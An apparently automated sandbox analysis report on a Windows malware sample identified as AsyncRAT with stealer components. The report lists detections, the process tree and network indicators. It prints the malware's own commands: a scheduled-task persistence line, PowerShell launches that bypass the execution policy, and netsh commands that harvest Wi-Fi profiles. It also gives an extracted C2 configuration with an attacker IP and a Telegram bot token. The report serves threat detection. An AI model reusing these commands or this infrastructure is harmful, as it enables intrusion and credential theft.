Windows Analysis Report
zrrHgsDzgS.exe

Overview

General Information

Sample name: zrrHgsDzgS.exe (renamed because the original name is a hash value)
Original sample name: 6d13d147a209e3be044035f0c03b7bde.exe
Analysis ID: 1464066
MD5: 6d13d147a209e3be044035f0c03b7bde
SHA1: 1eb5fb487ea7742ff1766ca5bf1b7191cfcf6283
SHA256: 9c457b1cd061ae951fbed7841149b247e085befa6e2c5170058ce35cdebce548
Tags: 32exe

Detection

AsyncRAT, PureLog Stealer, StormKitty, WorldWind Stealer, zgRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Sigma detected: Schedule system process
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AsyncRAT
Yara detected PureLog Stealer
Yara detected StormKitty Stealer
Yara detected Telegram RAT
Yara detected Telegram Recon
Yara detected WorldWind Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Drops PE files with benign system names
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Suspect Svchost Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: System File Execution Location Anomaly
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses netsh to modify the Windows network and firewall settings
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious desktop.ini Action
Sigma detected: Uncommon Svchost Parent Process
Stores large binary data to the registry
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • zrrHgsDzgS.exe (PID: 6452 cmdline: "C:\Users\user\Desktop\zrrHgsDzgS.exe" MD5: 6D13D147A209E3BE044035F0C03B7BDE)
    • cmd.exe (PID: 6736 cmdline: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6940 cmdline: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' MD5: 48C2FE20575769DE916F48EF0676A965)
    • cmd.exe (PID: 6788 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 7040 cmdline: timeout 3 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • svchost.exe (PID: 3620 cmdline: "C:\Users\user\AppData\Roaming\svchost.exe" MD5: 6D13D147A209E3BE044035F0C03B7BDE)
  • svchost.exe (PID: 7060 cmdline: C:\Users\user\AppData\Roaming\svchost.exe MD5: 6D13D147A209E3BE044035F0C03B7BDE)
    • cmd.exe (PID: 6952 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 824 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • udwnme.exe (PID: 4884 cmdline: "C:\Users\user\AppData\Local\Temp\udwnme.exe" MD5: DA34EA26DDFEDFD7966E8AEDF0BB93E6)
          • cmd.exe (PID: 5340 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 2368 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 6904 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • findstr.exe (PID: 6496 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 3312 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 4924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 3940 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 8 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
    • cmd.exe (PID: 1888 cmdline: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6852 cmdline: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • luglzv.exe (PID: 5052 cmdline: "C:\Users\user\AppData\Local\Temp\luglzv.exe" MD5: FF895D93516828450E0C0DD0E467E1D0)
          • cmd.exe (PID: 5064 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 5020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 1904 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 4624 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • findstr.exe (PID: 480 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 2144 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 1168 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 772 cmdline: netsh wlan show networks mode=bssid MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
  • cleanup
Name: AsyncRAT
Description: AsyncRAT is a Remote Access Tool (RAT) designed to remotely monitor and control other computers through a secure encrypted connection. It is an open source remote administration tool; however, it can also be used maliciously because it provides functionality such as a keylogger, remote desktop control, and many other functions that may cause harm to the victim's computer. In addition, AsyncRAT can be delivered via various methods such as spear-phishing, malvertising, exploit kits and other techniques.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat

Name: Cameleon, StormKitty
Description: PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

Name: zgRAT
Description: zgRAT is a Remote Access Trojan which sometimes drops other malware such as AgentTesla. zgRAT has an infostealer component which targets browser information and crypto wallets. It usually spreads by USB or by phishing emails with .zip/.lnk/.bat/.xlsx attachments and so on.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat
Extracted configuration (Telegram RAT): {"C2 url": "https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage"}
Extracted configuration (AsyncRAT): {"External_config_on_Pastebin": "null", "Server": "127.0.0.1,94.232.249.111", "Ports": "6606,7707,8808", "Version": "0.5.8", "Autorun": "true", "Install_Folder": "svchost.exe", "Install_File": "SHNUTU5pdURCTEJXcktBMGkwVVVmZzdxdHJGYmVUd3I="}
Yara matches on the submitted sample (Source, Rule, Description, Author, Strings):
Source: zrrHgsDzgS.exe, Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Author: Joe Security
Source: zrrHgsDzgS.exe, Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Author: Joe Security
Source: zrrHgsDzgS.exe, Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Author: unknown
  • 0xa28f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0xb638:$a2: Stub.exe
  • 0xb6c8:$a2: Stub.exe
  • 0x6f81:$a3: get_ActivatePong
  • 0xa4a7:$a4: vmware
  • 0xa31f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x7cd2:$a6: get_SslClient
Source: zrrHgsDzgS.exe, Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Author: ditekSHen
  • 0xa321:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM

Yara matches on captured network traffic (Source, Rule, Description, Author, Strings):
Source: dump.pcap, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen
  • 0x31d1f:$x1: AsyncRAT
  • 0x31d5d:$x1: AsyncRAT

Yara matches on dropped files (Source, Rule, Description, Author, Strings):
Source: C:\Users\user\AppData\Roaming\svchost.exe, Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Author: Joe Security
Source: C:\Users\user\AppData\Roaming\svchost.exe, Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Author: Joe Security
Source: C:\Users\user\AppData\Roaming\svchost.exe, Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Author: unknown
  • 0xa28f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0xb638:$a2: Stub.exe
  • 0xb6c8:$a2: Stub.exe
  • 0x6f81:$a3: get_ActivatePong
  • 0xa4a7:$a4: vmware
  • 0xa31f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x7cd2:$a6: get_SslClient
Source: C:\Users\user\AppData\Roaming\svchost.exe, Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Author: ditekSHen
  • 0xa321:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Author: Joe Security
Yara matches on process memory dumps (Source, Rule, Description, Author, Strings):
Source: 00000008.00000002.1805730959.0000000005577000.00000004.00000020.00020000.00000000.sdmp, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen
  • 0x4e0b:$x1: AsyncRAT
  • 0x4e49:$x1: AsyncRAT
Source: 00000007.00000002.2919350933.0000000003312000.00000004.00000800.00020000.00000000.sdmp, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen
  • 0x29feb:$x1: AsyncRAT
  • 0x2a029:$x1: AsyncRAT
Source: 00000007.00000002.2929848498.0000000005B77000.00000004.00000020.00020000.00000000.sdmp, Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Author: ditekSHen
  • 0xb15b:$x1: AsyncRAT
  • 0xb199:$x1: AsyncRAT
Source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 0000001C.00000002.2919353202.0000000002A22000.00000004.00000800.00020000.00000000.sdmp, Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Author: ditekSHen
  • 0x5fd0:$s1: [a-zA-Z0-9]{24}\.[a-zA-Z0-9]{6}\.[a-zA-Z0-9_\-]{27}|mfa\.[a-zA-Z0-9_\-]{84}
Yara matches on unpacked PE images (Source, Rule, Description, Author, Strings):
Source: 7.2.svchost.exe.7450000.3.raw.unpack, Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Author: Joe Security
Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Author: Joe Security
Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Author: Joe Security
Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, Rule: Windows_Trojan_Asyncrat_11a11ba1, Description: unknown, Author: unknown
  • 0xa28f:$a1: /c schtasks /create /f /sc onlogon /rl highest /tn "
  • 0xb638:$a2: Stub.exe
  • 0xb6c8:$a2: Stub.exe
  • 0x6f81:$a3: get_ActivatePong
  • 0xa4a7:$a4: vmware
  • 0xa31f:$a5: \nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS
  • 0x7cd2:$a6: get_SslClient
Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Author: ditekSHen
  • 0xa321:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM

System Summary

Source: File created; Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems); Data: EventID: 11, Image: C:\Users\user\Desktop\zrrHgsDzgS.exe, ProcessId: 6452, TargetFilename: C:\Users\user\AppData\Roaming\svchost.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zrrHgsDzgS.exe", ParentImage: C:\Users\user\Desktop\zrrHgsDzgS.exe, ParentProcessId: 6452, ParentProcessName: zrrHgsDzgS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 6736, ProcessName: cmd.exe
Source: Process started; Author: Jonathan Cheong, oscd.community; Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zrrHgsDzgS.exe", ParentImage: C:\Users\user\Desktop\zrrHgsDzgS.exe, ParentProcessId: 6452, ParentProcessName: zrrHgsDzgS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 6736, ProcessName: cmd.exe
Source: Process started; Author: David Burkett, @signalblur; Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7060, ProcessName: svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton; Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6952, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , ProcessId: 824, ProcessName: powershell.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali; Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7060, ProcessName: svchost.exe
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , CommandLine|base64offset|contains: mj,, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6736, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' , ProcessId: 6940, ProcessName: schtasks.exe
Source: File created; Author: Maxime Thiebaut (@0xThiebaut), Tim Shelton (HAWK.IO); Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\udwnme.exe, ProcessId: 4884, TargetFilename: C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\desktop.ini
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6788, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Users\user\AppData\Roaming\svchost.exe" , ProcessId: 3620, ProcessName: svchost.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , CommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6952, ParentProcessName: cmd.exe, ProcessCommandLine: powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' , ProcessId: 824, ProcessName: powershell.exe
Source: Process started; Author: vburov; Data: Command: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine: C:\Users\user\AppData\Roaming\svchost.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\svchost.exe, NewProcessName: C:\Users\user\AppData\Roaming\svchost.exe, OriginalFileName: C:\Users\user\AppData\Roaming\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\svchost.exe, ProcessId: 7060, ProcessName: svchost.exe

Persistence and Installation Behavior

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\zrrHgsDzgS.exe", ParentImage: C:\Users\user\Desktop\zrrHgsDzgS.exe, ParentProcessId: 6452, ParentProcessName: zrrHgsDzgS.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit, ProcessId: 6736, ProcessName: cmd.exe

Stealing of Sensitive Information

Source: Process started; Author: Joe Security; Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\udwnme.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\udwnme.exe, ParentProcessId: 4884, ParentProcessName: udwnme.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 5340, ProcessName: cmd.exe

Snort IDS alert:
Timestamp: 06/28/24-11:19:22.223998
SID: 2030673
Source Port: 7707
Destination Port: 49739
Protocol: TCP
Classtype: A Network Trojan was detected

Snort IDS alert:
Timestamp: 06/28/24-11:19:22.223998
SID: 2035595
Source Port: 7707
Destination Port: 49739
Protocol: TCP
Classtype: A Network Trojan was detected


AV Detection

Source: zrrHgsDzgS.exe, Avira: detected
Source: zrrHgsDzgS.exe, Malware Configuration Extractor: AsyncRAT {"External_config_on_Pastebin": "null", "Server": "127.0.0.1,94.232.249.111", "Ports": "6606,7707,8808", "Version": "0.5.8", "Autorun": "true", "Install_Folder": "svchost.exe", "Install_File": "SHNUTU5pdURCTEJXcktBMGkwVVVmZzdxdHJGYmVUd3I="}
Source: udwnme.exe.4884.15.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage"}
Source: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13, Virustotal: Detection: 8%
Source: C:\Users\user\AppData\Local\Temp\udwnme.exe, ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Roaming\svchost.exe, ReversingLabs: Detection: 86%
Source: zrrHgsDzgS.exe, ReversingLabs: Detection: 86%
Source: zrrHgsDzgS.exe, Virustotal: Detection: 82%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
Source: zrrHgsDzgS.exe, Joe Sandbox ML: detected
Source: zrrHgsDzgS.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:64790 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64791 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:64796 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64797 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:64801 version: TLS 1.2
Source: zrrHgsDzgS.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: winload_prod.pdb, source: Temp.txt.15.dr, Temp.txt.28.dr
Source: Binary string: ntkrnlmp.pdb, source: Temp.txt.15.dr, Temp.txt.28.dr
Source: Binary string: winload_prod.pdb\, source: Temp.txt.15.dr, Temp.txt.28.dr
Source: Binary string: ntkrnlmp.pdb\, source: Temp.txt.15.dr, Temp.txt.28.dr

Networking

Source: Traffic, Snort IDS: 2035595 ET TROJAN Generic AsyncRAT Style SSL Cert 94.232.249.111:7707 -> 192.168.2.4:49739
Source: Traffic, Snort IDS: 2030673 ET TROJAN Observed Malicious SSL Cert (AsyncRAT Server) 94.232.249.111:7707 -> 192.168.2.4:49739
Source: C:\Users\user\AppData\Roaming\svchost.exe, Network Connect: 94.232.249.111 7707
Source: unknown, DNS query: name: pastebin.com
Source: unknown, DNS query: name: api.telegram.org
Source: Yara match, File source: zrrHgsDzgS.exe, type: SAMPLE
Source: Yara match, File source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
